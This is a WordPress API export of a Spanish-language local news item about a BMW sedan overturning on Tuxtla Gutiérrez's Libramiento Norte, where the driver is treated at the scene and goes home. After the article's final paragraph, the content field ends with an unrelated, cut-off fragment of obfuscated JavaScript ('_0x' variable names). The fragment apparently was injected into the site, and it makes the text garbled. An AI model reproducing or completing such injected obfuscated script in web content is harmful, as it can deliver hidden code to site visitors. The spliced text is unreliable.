{"id":10594,"date":"2023-06-16T04:23:45","date_gmt":"2023-06-16T04:23:45","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10594"},"modified":"2023-06-16T04:23:46","modified_gmt":"2023-06-16T04:23:46","slug":"bmw-vuelca-en-el-libramiento-norte","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10594","title":{"rendered":"BMW vuelca en el Libramiento Norte"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686889361242-1024x576.jpg\" alt=\"\" class=\"wp-image-10595\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686889361242-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686889361242-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686889361242-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686889361242.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 15 de junio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Cerca de las 20 horas de este jueves se registr\u00f3 una volcadura de una unidad de lujo volc\u00f3 en el Libramiento Norte de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes de tr\u00e1nsito informaron que, el conductor de una unidad BMW de color blanco tipo sedan circulaba en esta vialidad cuando de manera repentina perdi\u00f3 el control, choc\u00f3 contra el camell\u00f3n central y termin\u00f3 volcando a la altura del asta bandera.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de tr\u00e1nsito y localizaron la unidad a medio carril en el sentido contrario y acordonaron la zona.<\/p>\n\n\n\n<p>El conductor termin\u00f3 con una herida en la cabeza, y diferentes golpes, el cual fue atendido por param\u00e9dicos de Protecci\u00f3n Civil Municipal y no fue trasladado a un nosocomio.<\/p>\n\n\n\n<p>Finalmente el conductor se fue a su casa y la unidad fue llevada al taller para su reparaci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 15 de junio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Cerca de las 20 horas de este jueves se registr\u00f3 una volcadura de una unidad de lujo volc\u00f3 en el Libramiento Norte de Tuxtla Guti\u00e9rrez. Los reportes de tr\u00e1nsito informaron que, el conductor de una unidad BMW de color blanco tipo sedan circulaba &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10595,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10594","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10594","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10594"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10594\/revisions"}],"predecessor-version":[{"id":10596,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10594\/revisions\/10596"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10595"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10594"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10594"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10594"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}